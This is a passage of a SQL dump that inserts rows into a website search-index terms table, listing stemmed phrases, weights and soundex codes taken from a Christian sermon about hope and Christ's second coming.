(267838, 'much more doth', 'much more doth', 0, 1, 1.4667, 'M2563', 1, '*'),
(267839, 'much more is', 'much more is', 0, 1, 1.4, 'M2562', 1, '*'),
(267840, 'must bring', 'must bring', 0, 1, 1.3333, 'M231652', 1, '*'),
(267841, 'must bring yourself', 'must bring yourself', 0, 1, 1.6333, 'M2316526241', 1, '*'),
(267842, 'must learn patience', 'must learn patience', 0, 1, 1.6333, 'M234651352', 1, '*'),
(267843, 'must live', 'must live', 0, 1, 1.3, 'M2341', 1, '*'),
(267844, 'must live ready', 'must live ready', 0, 1, 1.5, 'M234163', 1, '*'),
(267845, 'needlessly', 'needlessli', 0, 0, 0.6667, 'N3424', 1, '*'),
(267846, 'needlessly or', 'needlessli or', 0, 1, 1.4333, 'N34246', 1, '*'),
(267847, 'needlessly or endlessly', 'needlessli or endlessly', 0, 1, 1.7667, 'N3424653424', 1, '*'),
(267848, 'new purity', 'new purity', 0, 1, 1.3333, 'N163', 1, '*'),
(267849, 'new purity and', 'new purity and', 0, 1, 1.4667, 'N16353', 1, '*'),
(267850, 'not a hopeless', 'not a hopeless', 0, 1, 1.4667, 'N3142', 1, '*'),
(267851, 'not abandoned', 'not abandoned', 0, 1, 1.4333, 'N315353', 1, '*'),
(267852, 'not abandoned us', 'not abandoned us', 0, 1, 1.5333, 'N3153532', 1, '*'),
(267853, 'not coming back', 'not coming back', 0, 1, 1.5, 'N325212', 1, '*'),
(267854, 'not having spot', 'not having spot', 0, 1, 1.5, 'N315213', 1, '*'),
(267855, 'not sure', 'not sure', 0, 1, 1.2667, 'N326', 2, '*'),
(267856, 'not sure if', 'not sure if', 0, 1, 1.3667, 'N3261', 1, '*'),
(267857, 'not the statement', 'not the statement', 0, 1, 1.5667, 'N32353', 1, '*'),
(267858, 'not the unclean', 'not the unclean', 0, 1, 1.5, 'N35245', 1, '*'),
(267859, 'now if', 'now if', 0, 1, 1.2, 'N100', 1, '*'),
(267860, 'now if the', 'now if the', 0, 1, 1.3333, 'N130', 1, '*'),
(267861, 'of christ romans', 'of christ romans', 0, 1, 1.5333, 'O12623652', 1, '*'),
(267862, 'of christ s', 'of christ s', 0, 1, 1.3667, 'O126232', 1, '*'),
(267863, 'of christ therefore', 'of christ therefore', 0, 1, 1.6333, 'O12623616', 1, '*'),
(267864, 'of christ what', 'of christ what', 0, 1, 1.4667, 'O12623', 1, '*'),
(267865, 'of christ\'s', 'of christ', 0, 1, 1.3667, 'O126232', 1, '*'),
(267866, 'of christ\'s second', 'of christ second', 0, 1, 1.6, 'O12623253', 1, '*'),
(267867, 'of condemnation', 'of condemnation', 0, 1, 1.5, 'O1253535', 1, '*'),
(267868, 'of condemnation be', 'of condemnation be', 0, 1, 1.6, 'O12535351', 1, '*'),
(267869, 'of his deep', 'of his deep', 0, 1, 1.3667, 'O1231', 1, '*'),
(267870, 'of our hope', 'of our hope', 0, 1, 1.3667, 'O161', 1, '*'),
(267871, 'of righteousness exceed', 'of righteousness exceed', 0, 1, 1.7667, 'O16232523', 1, '*'),
(267872, 'of the end-time', 'of the end-time', 0, 1, 1.5, 'O13535', 1, '*'),
(267873, 'of the new', 'of the new', 0, 1, 1.3333, 'O135', 1, '*'),
(267874, 'of waiting', 'of waiting', 0, 1, 1.3333, 'O1352', 1, '*'),
(267875, 'of waiting for', 'of waiting for', 0, 1, 1.4667, 'O135216', 1, '*'),
(267876, 'of water by', 'of water by', 0, 1, 1.3667, 'O1361', 1, '*'),
(267877, 'old testament which', 'old testament which', 0, 1, 1.6333, 'O4323532', 1, '*'),
(267878, 'on him cleanses', 'on him cleanses', 0, 1, 1.5, 'O52452', 1, '*'),
(267879, 'one day sooner', 'on day sooner', 0, 1, 1.4667, 'O53256', 1, '*'),
(267880, 'opposition', 'opposit', 0, 0, 0.6667, 'O1235', 1, '*'),
(267881, 'opposition and', 'opposit and', 0, 1, 1.4667, 'O12353', 1, '*'),
(267882, 'opposition and tribulation', 'opposit and tribulation', 0, 1, 1.8667, 'O1235361435', 1, '*'),
(267883, 'or any', 'or any', 0, 1, 1.2, 'O650', 1, '*'),
(267884, 'or any such', 'or any such', 0, 1, 1.3667, 'O652', 1, '*'),
(267885, 'or endlessly', 'or endlessly', 0, 1, 1.4, 'O653424', 1, '*'),
(267886, 'or endlessly for', 'or endlessly for', 0, 1, 1.5333, 'O65342416', 1, '*'),
(267887, 'or later', 'or later', 0, 1, 1.2667, 'O6436', 1, '*'),
(267888, 'or later christ', 'or later christ', 0, 1, 1.5, 'O64362623', 1, '*'),
(267889, 'or not the', 'or not the', 0, 1, 1.3333, 'O653', 1, '*'),
(267890, 'or wrinkle', 'or wrinkle', 0, 1, 1.3333, 'O6524', 1, '*'),
(267891, 'or wrinkle or', 'or wrinkle or', 0, 1, 1.4333, 'O65246', 1, '*'),
(267892, 'our future', 'our future', 0, 1, 1.3333, 'O6136', 1, '*'),
(267893, 'our future and', 'our future and', 0, 1, 1.4667, 'O613653', 1, '*'),
(267894, 'our hope', 'our hope', 0, 1, 1.2667, 'O610', 1, '*'),
(267895, 'our hope for', 'our hope for', 0, 1, 1.4, 'O616', 1, '*'),
(267896, 'our hope is', 'our hope is', 0, 1, 1.3667, 'O612', 1, '*'),
(267897, 'our hope of', 'our hope of', 0, 1, 1.3667, 'O610', 1, '*'),
(267898, 'our hope”.', 'our hope”.', 0, 1, 1.3333, 'O610', 1, '*'),
(267899, 'our hope”. an', 'our hope”. an', 0, 1, 1.4333, 'O615', 1, '*'),
(267900, 'our lord', 'our lord', 0, 1, 1.2667, 'O6463', 1, '*'),
(267901, 'our lord will', 'our lord will', 0, 1, 1.4333, 'O64634', 1, '*'),
(267902, 'our text', 'our text', 0, 1, 1.2667, 'O6323', 1, '*'),
(267903, 'our text above', 'our text above', 0, 1, 1.4667, 'O63231', 1, '*'),
(267904, 'patience that god', 'patienc that god', 0, 1, 1.5667, 'P352323', 1, '*'),
(267905, 'paul made', 'paul made', 0, 1, 1.3, 'P453', 1, '*'),
(267906, 'paul made was', 'paul made was', 0, 1, 1.4333, 'P4532', 1, '*'),
(267907, 'paul was', 'paul was', 0, 1, 1.2667, 'P420', 1, '*'),
(267908, 'paul was re-enacting', 'paul was re-enacting', 0, 1, 1.6667, 'P42652352', 1, '*'),
(267909, 'physical form', 'physic form', 0, 1, 1.4333, 'P24165', 1, '*'),
(267910, 'physical form “all', 'physic form “all', 0, 1, 1.6, 'P241654', 1, '*'),
(267911, 'present it', 'present it', 0, 1, 1.3333, 'P6253', 1, '*'),
(267912, 'present it to', 'present it to', 0, 1, 1.4333, 'P6253', 1, '*'),
(267913, 'present status', 'present status', 0, 1, 1.4667, 'P6253232', 1, '*'),
(267914, 'present status as', 'present status as', 0, 1, 1.5667, 'P6253232', 1, '*'),
(267915, 'pure chaste', 'pure chaste', 0, 1, 1.3667, 'P623', 1, '*'),
(267916, 'pure chaste undefiled', 'pure chaste undefiled', 0, 1, 1.7, 'P62353143', 1, '*'),
(267917, 'purifies', 'purifi', 0, 0, 0.5333, 'P612', 1, '*'),
(267918, 'purifies himself', 'purifi himself', 0, 1, 1.5333, 'P6125241', 1, '*'),
(267919, 'purifies himself just', 'purifi himself just', 0, 1, 1.7, 'P612524123', 1, '*'),
(267920, 'purity', 'puriti', 0, 0, 0.4, 'P630', 1, '*'),
(267921, 'purity and', 'puriti and', 0, 1, 1.3333, 'P6353', 1, '*'),
(267922, 'purity and holiness', 'puriti and holiness', 0, 1, 1.6333, 'P6353452', 1, '*'),
(267923, 'questions that will', 'question that will', 0, 1, 1.6333, 'Q35234', 1, '*'),
(267924, 'raised from', 'rais from', 0, 1, 1.3667, 'R23165', 1, '*'),
(267925, 'raised from the', 'rais from the', 0, 1, 1.5, 'R231653', 1, '*'),
(267926, 're-enacting', 're-enact', 0, 0, 0.7333, 'R52352', 1, '*'),
(267927, 're-enacting their', 're-enact their', 0, 1, 1.5667, 'R5235236', 1, '*'),
(267928, 're-enacting their hopes', 're-enact their hopes', 0, 1, 1.7667, 'R523523612', 1, '*'),
(267929, 'ready in', 'readi in', 0, 1, 1.2667, 'R350', 1, '*'),
(267930, 'ready in such', 'readi in such', 0, 1, 1.4333, 'R352', 1, '*'),
(267931, 'ready live', 'readi live', 0, 1, 1.3333, 'R341', 1, '*'),
(267932, 'ready live holy', 'readi live holy', 0, 1, 1.5, 'R3414', 1, '*'),
(267933, 'reality of', 'realiti of', 0, 1, 1.3333, 'R431', 1, '*'),
(267934, 'reality of the', 'realiti of the', 0, 1, 1.4667, 'R4313', 1, '*'),
(267935, 'relate with the', 'relat with the', 0, 1, 1.5, 'R430', 1, '*'),
(267936, 'resting', 'rest', 0, 0, 0.4667, 'R2352', 1, '*'),
(267937, 'resting on', 'rest on', 0, 1, 1.3333, 'R23525', 1, '*'),
(267938, 'resting on him', 'rest on him', 0, 1, 1.4667, 'R23525', 1, '*'),
(267939, 'return live', 'return live', 0, 1, 1.3667, 'R36541', 1, '*'),
(267940, 'return live ready', 'return live ready', 0, 1, 1.5667, 'R3654163', 1, '*'),
(267941, 'rev 1', 'rev 1', 0, 1, 1.1667, 'R100', 1, '*'),
(267942, 'rev 1 7-9', 'rev 1 7-9', 0, 1, 1.3, 'R100', 1, '*'),
(267943, 'righteousness exceed', 'righteous exceed', 0, 1, 1.6667, 'R232523', 1, '*'),
(267944, 'righteousness exceed in', 'righteous exceed in', 0, 1, 1.7667, 'R2325235', 1, '*'),
(267945, 'romans 8 35-39', 'roman 8 35-39', 0, 1, 1.4667, 'R520', 1, '*'),
(267946, 's second', 's second', 0, 1, 1.2667, 'S530', 1, '*'),
(267947, 's second coming', 's second coming', 0, 1, 1.5, 'S53252', 1, '*'),
(267948, 'saints how', 'saint how', 0, 1, 1.3333, 'S532', 1, '*'),
(267949, 'saints how do', 'saint how do', 0, 1, 1.4333, 'S5323', 1, '*'),
(267950, 'sanctify', 'sanctifi', 0, 0, 0.5333, 'S5231', 1, '*'),
(267951, 'sanctify and', 'sanctifi and', 0, 1, 1.4, 'S523153', 1, '*'),
(267952, 'sanctify and cleanse', 'sanctifi and cleanse', 0, 1, 1.6667, 'S5231532452', 1, '*'),
(267953, 'second coming is', 'second coming is', 0, 1, 1.5333, 'S53252', 1, '*'),
(267954, 'see him”.', 'see him”.', 0, 1, 1.3, 'S500', 1, '*'),
(267955, 'see him”. there', 'see him”. there', 0, 1, 1.5, 'S536', 1, '*'),
(267956, 'shall find', 'shall find', 0, 1, 1.3333, 'S4153', 1, '*'),
(267957, 'shall find him', 'shall find him', 0, 1, 1.4667, 'S41535', 1, '*'),
(267958, 'shall see him”.', 'shall see him”.', 0, 1, 1.5, 'S425', 1, '*'),
(267959, 'should be holy', 'should be holy', 0, 1, 1.4667, 'S4314', 1, '*'),
(267960, 'sin he', 'sin he', 0, 1, 1.2, 'S500', 1, '*'),
(267961, 'sin he is', 'sin he is', 0, 1, 1.3, 'S520', 1, '*'),
(267962, 'so doing luke', 'so doing luke', 0, 1, 1.4333, 'S35242', 1, '*'),
(267963, 'somebody that', 'somebodi that', 0, 1, 1.4333, 'S513', 1, '*'),
(267964, 'somebody that you', 'somebodi that you', 0, 1, 1.5667, 'S513', 1, '*'),
(267965, 'somehow', 'somehow', 0, 0, 0.4667, 'S500', 1, '*'),
(267966, 'somehow hopeless', 'somehow hopeless', 0, 1, 1.5333, 'S5142', 1, '*'),
(267967, 'somehow hopeless 1', 'somehow hopeless 1', 0, 1, 1.6, 'S5142', 1, '*'),
(267968, 'someone to', 'someon to', 0, 1, 1.3333, 'S530', 1, '*'),
(267969, 'someone to wait', 'someon to wait', 0, 1, 1.5, 'S530', 1, '*'),
(267970, 'son from', 'son from', 0, 1, 1.2667, 'S5165', 1, '*'),
(267971, 'son from heaven', 'son from heaven', 0, 1, 1.5, 'S516515', 1, '*'),
(267972, 'soon return', 'soon return', 0, 1, 1.3667, 'S56365', 1, '*'),
(267973, 'soon return live', 'soon return live', 0, 1, 1.5333, 'S5636541', 1, '*'),
(267974, 'sooner', 'sooner', 0, 0, 0.4, 'S560', 1, '*'),
(267975, 'sooner or', 'sooner or', 0, 1, 1.3, 'S560', 1, '*'),
(267976, 'sooner or later', 'sooner or later', 0, 1, 1.5, 'S56436', 1, '*'),
(267977, 'spot', 'spot', 0, 0, 0.2667, 'S130', 1, '*'),
(267978, 'spot or', 'spot or', 0, 1, 1.2333, 'S136', 1, '*'),
(267979, 'spot or wrinkle', 'spot or wrinkle', 0, 1, 1.5, 'S136524', 1, '*'),
(267980, 'stand by', 'stand by', 0, 1, 1.2667, 'S3531', 1, '*'),
(267981, 'stand by the', 'stand by the', 0, 1, 1.4, 'S35313', 1, '*'),
(267982, 'standard much', 'standard much', 0, 1, 1.4333, 'S3536352', 1, '*'),
(267983, 'standard much more', 'standard much more', 0, 1, 1.6, 'S353635256', 1, '*'),
(267984, 'standing by', 'stand by', 0, 1, 1.3667, 'S353521', 1, '*'),
(267985, 'standing by the', 'stand by the', 0, 1, 1.5, 'S3535213', 1, '*'),
(267986, 'state he\'s', 'state he', 0, 1, 1.3333, 'S320', 1, '*'),
(267987, 'state he\'s expecting', 'state he expecting', 0, 1, 1.6667, 'S3212352', 1, '*'),
(267988, 'state of our', 'state of our', 0, 1, 1.4, 'S316', 1, '*'),
(267989, 'statement that', 'statement that', 0, 1, 1.4667, 'S353', 1, '*'),
(267990, 'statement that paul', 'statement that paul', 0, 1, 1.6333, 'S35314', 1, '*'),
(267991, 'status as', 'statu as', 0, 1, 1.3, 'S320', 1, '*'),
(267992, 'status as believers', 'statu as believers', 0, 1, 1.6333, 'S3214162', 1, '*'),
(267993, 'still coming', 'still coming', 0, 1, 1.4, 'S34252', 1, '*'),
(267994, 'still coming back', 'still coming back', 0, 1, 1.5667, 'S3425212', 1, '*'),
(267995, 'such a way', 'such a way', 0, 1, 1.3333, 'S000', 1, '*'),
(267996, 'such thing', 'such thing', 0, 1, 1.3333, 'S352', 1, '*'),
(267997, 'such thing but', 'such thing but', 0, 1, 1.4667, 'S35213', 1, '*'),
(267998, 'sure if', 'sure if', 0, 1, 1.2333, 'S610', 1, '*'),
(267999, 'sure if he', 'sure if he', 0, 1, 1.3333, 'S610', 1, '*'),
(268000, 'tell someone', 'tell someone', 0, 1, 1.4, 'T425', 1, '*'),
(268001, 'tell someone to', 'tell someone to', 0, 1, 1.5, 'T4253', 1, '*'),
(268002, 'testament which', 'testament which', 0, 1, 1.5, 'T23532', 1, '*'),
(268003, 'testament which is', 'testament which is', 0, 1, 1.6, 'T23532', 1, '*'),
(268004, 'testimony of', 'testimoni of', 0, 1, 1.4, 'T2351', 1, '*'),
(268005, 'testimony of jesus', 'testimoni of jesus', 0, 1, 1.6, 'T23512', 1, '*'),
(268006, 'text above', 'text above', 0, 1, 1.3333, 'T231', 1, '*'),
(268007, 'text above paul', 'text above paul', 0, 1, 1.5, 'T2314', 1, '*'),
(268008, 'text rev', 'text rev', 0, 1, 1.2667, 'T2361', 1, '*'),
(268009, 'text rev 1', 'text rev 1', 0, 1, 1.3333, 'T2361', 1, '*'),
(268010, 'that he might', 'that he might', 0, 1, 1.4333, 'T523', 1, '*'),
(268011, 'that is hoping', 'that is hoping', 0, 1, 1.4667, 'T2152', 1, '*'),
(268012, 'that jesus is', 'that jesus is', 0, 1, 1.4333, 'T200', 2, '*'),
(268013, 'that one day', 'that one day', 0, 1, 1.4, 'T530', 1, '*'),
(268014, 'that our', 'that our', 0, 1, 1.2667, 'T600', 1, '*'),
(268015, 'that our lord', 'that our lord', 0, 1, 1.4333, 'T6463', 1, '*'),
(268016, 'that paul made', 'that paul made', 0, 1, 1.4667, 'T1453', 1, '*'),
(268017, 'that will determine', 'that will determine', 0, 1, 1.6333, 'T4365', 1, '*'),
(268018, 'the admonition', 'the admonition', 0, 1, 1.4667, 'T535', 1, '*'),
(268019, 'the admonition \'to', 'the admonition to', 0, 1, 1.6, 'T5353', 1, '*'),
(268020, 'the backsliders', 'the backsliders', 0, 1, 1.5, 'T124362', 1, '*'),
(268021, 'the backsliders he\'s', 'the backsliders he', 0, 1, 1.6667, 'T124362', 1, '*'),
(268022, 'the church of', 'the church of', 0, 1, 1.4333, 'T2621', 1, '*'),
(268023, 'the church to', 'the church to', 0, 1, 1.4333, 'T2623', 1, '*'),
(268024, 'the church “that', 'the church “that', 0, 1, 1.5333, 'T2623', 1, '*'),
(268025, 'the coming', 'the coming', 0, 1, 1.3333, 'T252', 1, '*'),
(268026, 'the coming must', 'the coming must', 0, 1, 1.5, 'T252523', 1, '*'),
(268027, 'the coming of', 'the coming of', 0, 1, 1.4333, 'T2521', 1, '*'),
(268028, 'the consciousness', 'the consciousness', 0, 1, 1.5667, 'T25252', 2, '*'),
(268029, 'the consciousness that', 'the consciousness that', 0, 1, 1.7333, 'T252523', 1, '*'),
(268030, 'the dead even', 'the dead even', 0, 1, 1.4333, 'T150', 1, '*'),
(268031, 'the end-time', 'the end-time', 0, 1, 1.4, 'T535', 1, '*'),
(268032, 'the end-time the', 'the end-time the', 0, 1, 1.5333, 'T5353', 1, '*'),
(268033, 'the eyes shall', 'the eyes shall', 0, 1, 1.4667, 'T240', 1, '*'),
(268034, 'the hope', 'the hope', 0, 1, 1.2667, 'T100', 1, '*'),
(268035, 'the hope of', 'the hope of', 0, 1, 1.3667, 'T100', 1, '*'),
(268036, 'the hopefulness', 'the hopefulness', 0, 1, 1.5, 'T1452', 1, '*'),
(268037, 'the hopefulness that', 'the hopefulness that', 0, 1, 1.6667, 'T14523', 1, '*'),
(268038, 'the hypocrite', 'the hypocrite', 0, 1, 1.4333, 'T1263', 1, '*'),
(268039, 'the hypocrite and', 'the hypocrite and', 0, 1, 1.5667, 'T126353', 1, '*'),
(268040, 'the lord cometh', 'the lord cometh', 0, 1, 1.5, 'T463253', 1, '*'),
(268041, 'the love', 'the love', 0, 1, 1.2667, 'T410', 1, '*'),
(268042, 'the love of', 'the love of', 0, 1, 1.3667, 'T410', 1, '*'),
(268043, 'the major disparity', 'the major disparity', 0, 1, 1.6333, 'T52632163', 1, '*'),
(268044, 'the ministration', 'the ministration', 0, 1, 1.5333, 'T523635', 1, '*'),
(268045, 'the ministration of', 'the ministration of', 0, 1, 1.6333, 'T5236351', 1, '*'),
(268046, 'the new purity', 'the new purity', 0, 1, 1.4667, 'T5163', 1, '*'),
(268047, 'the reality', 'the reality', 0, 1, 1.3667, 'T643', 1, '*'),
(268048, 'the reality of', 'the reality of', 0, 1, 1.4667, 'T6431', 1, '*'),
(268049, 'the saints', 'the saints', 0, 1, 1.3333, 'T2532', 1, '*'),
(268050, 'the saints how', 'the saints how', 0, 1, 1.4667, 'T2532', 1, '*'),
(268051, 'the state', 'the state', 0, 1, 1.3, 'T230', 1, '*'),
(268052, 'the state of', 'the state of', 0, 1, 1.4, 'T231', 1, '*'),
(268053, 'the statement', 'the statement', 0, 1, 1.4333, 'T2353', 1, '*'),
(268054, 'the statement that', 'the statement that', 0, 1, 1.6, 'T2353', 1, '*'),
(268055, 'the unclean', 'the unclean', 0, 1, 1.3667, 'T5245', 1, '*'),
(268056, 'the unclean thing”.', 'the unclean thing”.', 0, 1, 1.6333, 'T5245352', 1, '*'),
(268057, 'the washing', 'the washing', 0, 1, 1.3667, 'T252', 1, '*'),
(268058, 'the washing of', 'the washing of', 0, 1, 1.4667, 'T2521', 1, '*'),
(268059, 'the word that', 'the word that', 0, 1, 1.4333, 'T630', 1, '*'),
(268060, 'the wrath', 'the wrath', 0, 1, 1.3, 'T630', 2, '*'),
(268061, 'the wrath to', 'the wrath to', 0, 1, 1.4, 'T630', 1, '*'),
(268062, 'their hopes', 'their hopes', 0, 1, 1.3667, 'T612', 1, '*'),
(268063, 'their hopes in', 'their hopes in', 0, 1, 1.4667, 'T6125', 1, '*'),
(268064, 'there are questions', 'there are questions', 0, 1, 1.6333, 'T62352', 1, '*'),
(268065, 'there is future', 'there is future', 0, 1, 1.5, 'T62136', 1, '*'),
(268066, 'there may', 'there may', 0, 1, 1.3, 'T650', 1, '*'),
(268067, 'there may be', 'there may be', 0, 1, 1.4, 'T651', 1, '*'),
(268068, 'therefore stand', 'therefor stand', 0, 1, 1.5, 'T6162353', 1, '*'),
(268069, 'therefore stand by', 'therefor stand by', 0, 1, 1.6, 'T61623531', 1, '*'),
(268070, 'thessalonians 1', 'thessalonian 1', 0, 1, 1.5, 'T2452', 1, '*'),
(268071, 'thessalonians 1 10', 'thessalonian 1 10', 0, 1, 1.6, 'T2452', 1, '*'),
(268072, 'thing but', 'thing but', 0, 1, 1.3, 'T5213', 1, '*'),
(268073, 'thing but is', 'thing but is', 0, 1, 1.4, 'T52132', 1, '*'),
(268074, 'thing”.', 'thing”.', 0, 0, 0.4667, 'T520', 1, '*'),
(268075, 'thing”. our', 'thing”. our', 0, 1, 1.3667, 'T526', 1, '*'),
(268076, 'thing”. our hope', 'thing”. our hope', 0, 1, 1.5333, 'T5261', 1, '*'),
(268077, 'this consciousness', 'thi consciousness', 0, 1, 1.6, 'T25252', 1, '*'),
(268078, 'this consciousness makes', 'thi consciousness makes', 0, 1, 1.8, 'T2525252', 1, '*'),
(268079, 'this hope', 'thi hope', 0, 1, 1.3, 'T210', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(268080, 'this hope resting', 'thi hope resting', 0, 1, 1.5667, 'T2162352', 1, '*'),
(268081, 'this is why', 'thi is why', 0, 1, 1.3667, 'T200', 1, '*'),
(268082, 'this we', 'thi we', 0, 1, 1.2333, 'T200', 1, '*'),
(268083, 'this we must', 'thi we must', 0, 1, 1.4, 'T2523', 1, '*'),
(268084, 'those living', 'those living', 0, 1, 1.4, 'T24152', 1, '*'),
(268085, 'those living in', 'those living in', 0, 1, 1.5, 'T241525', 1, '*'),
(268086, 'to be acceptable', 'to be acceptable', 0, 1, 1.5333, 'T121314', 1, '*'),
(268087, 'to come.”1', 'to come.”1', 0, 1, 1.3333, 'T250', 1, '*'),
(268088, 'to come.”1 thessalonians', 'to come.”1 thessalonians', 0, 1, 1.8, 'T2532452', 1, '*'),
(268089, 'to himself', 'to himself', 0, 1, 1.3333, 'T5241', 1, '*'),
(268090, 'to himself a', 'to himself a', 0, 1, 1.4, 'T5241', 1, '*'),
(268091, 'to wait', 'to wait', 0, 1, 1.2333, 'T000', 1, '*'),
(268092, 'to wait for', 'to wait for', 0, 1, 1.3667, 'T160', 1, '*'),
(268093, 'to wait needlessly', 'to wait needlessly', 0, 1, 1.6, 'T53424', 1, '*'),
(268094, 'touch not', 'touch not', 0, 1, 1.3, 'T253', 1, '*'),
(268095, 'touch not the', 'touch not the', 0, 1, 1.4333, 'T253', 1, '*'),
(268096, 'tribulation but', 'tribul but', 0, 1, 1.5, 'T6143513', 1, '*'),
(268097, 'tribulation but in', 'tribul but in', 0, 1, 1.6, 'T61435135', 1, '*'),
(268098, 'tribulation there', 'tribul there', 0, 1, 1.5667, 'T6143536', 1, '*'),
(268099, 'tribulation there are', 'tribul there are', 0, 1, 1.7, 'T6143536', 1, '*'),
(268100, 'unbeliever is', 'unbeliev is', 0, 1, 1.4333, 'U514162', 1, '*'),
(268101, 'unbeliever is in', 'unbeliev is in', 0, 1, 1.5333, 'U5141625', 1, '*'),
(268102, 'unbeliever is somehow', 'unbeliev is somehow', 0, 1, 1.7, 'U5141625', 1, '*'),
(268103, 'unclean thing”.', 'unclean thing”.', 0, 1, 1.5, 'U5245352', 1, '*'),
(268104, 'unclean thing”. our', 'unclean thing”. our', 0, 1, 1.6333, 'U52453526', 1, '*'),
(268105, 'undefiled', 'undefil', 0, 0, 0.6, 'U53143', 1, '*'),
(268106, 'undefiled guiltless', 'undefil guiltless', 0, 1, 1.6333, 'U5314324342', 1, '*'),
(268107, 'undefiled guiltless 1', 'undefil guiltless 1', 0, 1, 1.7, 'U5314324342', 1, '*'),
(268108, 'us standing', 'us standing', 0, 1, 1.3667, 'U235352', 1, '*'),
(268109, 'us standing by', 'us standing by', 0, 1, 1.4667, 'U2353521', 1, '*'),
(268110, 'us “there', 'us “there', 0, 1, 1.3, 'U236', 1, '*'),
(268111, 'us “there is', 'us “there is', 0, 1, 1.4, 'U2362', 1, '*'),
(268112, 'wait for him', 'wait for him', 0, 1, 1.4, 'W3165', 1, '*'),
(268113, 'wait for his', 'wait for his', 0, 1, 1.4, 'W3162', 1, '*'),
(268114, 'wait needlessly', 'wait needlessly', 0, 1, 1.5, 'W353424', 1, '*'),
(268115, 'wait needlessly or', 'wait needlessly or', 0, 1, 1.6, 'W3534246', 1, '*'),
(268116, 'waiting for his', 'wait for his', 0, 1, 1.5, 'W352162', 1, '*'),
(268117, 'waiting for live', 'wait for live', 0, 1, 1.5333, 'W3521641', 1, '*'),
(268118, 'was born', 'wa born', 0, 1, 1.2667, 'W2165', 1, '*'),
(268119, 'was born out', 'wa born out', 0, 1, 1.4, 'W21653', 1, '*'),
(268120, 'was re-enacting', 'wa re-enacting', 0, 1, 1.5, 'W2652352', 1, '*'),
(268121, 'was re-enacting their', 'wa re-enacting their', 0, 1, 1.7, 'W265235236', 1, '*'),
(268122, 'washing', 'wash', 0, 0, 0.4667, 'W252', 1, '*'),
(268123, 'washing of', 'wash of', 0, 1, 1.3333, 'W2521', 1, '*'),
(268124, 'washing of water', 'wash of water', 0, 1, 1.5333, 'W252136', 1, '*'),
(268125, 'water by', 'water by', 0, 1, 1.2667, 'W361', 1, '*'),
(268126, 'water by the', 'water by the', 0, 1, 1.4, 'W3613', 1, '*'),
(268127, 'way that', 'wai that', 0, 1, 1.2667, 'W300', 1, '*'),
(268128, 'way that when', 'wai that when', 0, 1, 1.4333, 'W350', 1, '*'),
(268129, 'we must learn', 'we must learn', 0, 1, 1.4333, 'W523465', 1, '*'),
(268130, 'what is your', 'what is your', 0, 1, 1.4, 'W326', 1, '*'),
(268131, 'when the lord', 'when the lord', 0, 1, 1.4333, 'W53463', 2, '*'),
(268132, 'which delivered', 'which delivered', 0, 1, 1.5, 'W234163', 1, '*'),
(268133, 'which delivered us', 'which delivered us', 0, 1, 1.6, 'W2341632', 1, '*'),
(268134, 'which is a', 'which is a', 0, 1, 1.3333, 'W200', 1, '*'),
(268135, 'who has this', 'who has this', 0, 1, 1.4, 'W232', 1, '*'),
(268136, 'whom he', 'whom he', 0, 1, 1.2333, 'W500', 2, '*'),
(268137, 'whom he raised', 'whom he raised', 0, 1, 1.4667, 'W5623', 1, '*'),
(268138, 'why because', 'why because', 0, 1, 1.3667, 'W120', 1, '*'),
(268139, 'why because there', 'why because there', 0, 1, 1.5667, 'W1236', 1, '*'),
(268140, 'why christ', 'why christ', 0, 1, 1.3333, 'W2623', 1, '*'),
(268141, 'why christ gave', 'why christ gave', 0, 1, 1.5, 'W262321', 1, '*'),
(268142, 'will certainly', 'will certainly', 0, 1, 1.4667, 'W426354', 1, '*'),
(268143, 'will certainly bring', 'will certainly bring', 0, 1, 1.6667, 'W4263541652', 1, '*'),
(268144, 'will determine the', 'will determine the', 0, 1, 1.6, 'W43653', 1, '*'),
(268145, 'will soon', 'will soon', 0, 1, 1.3, 'W425', 1, '*'),
(268146, 'will soon return', 'will soon return', 0, 1, 1.5333, 'W4256365', 1, '*'),
(268147, 'with the consciousness', 'with the consciousness', 0, 1, 1.7333, 'W325252', 1, '*'),
(268148, 'with the reality', 'with the reality', 0, 1, 1.5333, 'W3643', 1, '*'),
(268149, 'with the washing', 'with the washing', 0, 1, 1.5333, 'W3252', 1, '*'),
(268150, 'with this', 'with this', 0, 1, 1.3, 'W320', 1, '*'),
(268151, 'with this consciousness', 'with this consciousness', 0, 1, 1.7667, 'W325252', 1, '*'),
(268152, 'without blemish', 'without blemish', 0, 1, 1.5, 'W31452', 1, '*'),
(268153, 'without blemish ephesians', 'without blemish ephesians', 0, 1, 1.8333, 'W314521252', 1, '*'),
(268154, 'word that he', 'word that he', 0, 1, 1.4, 'W630', 1, '*'),
(268155, 'worth waiting', 'worth waiting', 0, 1, 1.4333, 'W6352', 1, '*'),
(268156, 'worth waiting for', 'worth waiting for', 0, 1, 1.5667, 'W635216', 1, '*'),
(268157, 'wrath to', 'wrath to', 0, 1, 1.2667, 'W630', 1, '*'),
(268158, 'wrath to come.”1', 'wrath to come.”1', 0, 1, 1.5333, 'W6325', 1, '*'),
(268159, 'wrinkle', 'wrinkl', 0, 0, 0.4667, 'W6524', 1, '*'),
(268160, 'wrinkle or', 'wrinkl or', 0, 1, 1.3333, 'W65246', 1, '*'),
(268161, 'wrinkle or any', 'wrinkl or any', 0, 1, 1.4667, 'W652465', 1, '*'),
(268162, 'you are hoping', 'you are hoping', 0, 1, 1.4667, 'Y6152', 1, '*'),
(268163, 'you don\'t tell', 'you don tell', 0, 1, 1.4667, 'Y3534', 1, '*'),
(268164, 'you inseparable', 'you inseparable', 0, 1, 1.5, 'Y521614', 1, '*'),
(268165, 'you inseparable from', 'you inseparable from', 0, 1, 1.6667, 'Y521614165', 1, '*'),
(268166, 'you must bring', 'you must bring', 0, 1, 1.4667, 'Y5231652', 1, '*'),
(268167, 'you relate', 'you relate', 0, 1, 1.3333, 'Y643', 1, '*'),
(268168, 'you relate with', 'you relate with', 0, 1, 1.5, 'Y643', 1, '*'),
(268169, 'your present', 'your present', 0, 1, 1.4, 'Y616253', 1, '*'),
(268170, 'your present status', 'your present status', 0, 1, 1.6333, 'Y616253232', 1, '*'),
(268171, 'yourself into', 'yourself into', 0, 1, 1.4333, 'Y624153', 1, '*'),
(268172, 'yourself into if', 'yourself into if', 0, 1, 1.5333, 'Y6241531', 1, '*'),
(268173, '“all', '“all', 0, 0, 0.2667, '“400', 1, '*'),
(268174, '“all the', '“all the', 0, 1, 1.2667, '“430', 1, '*'),
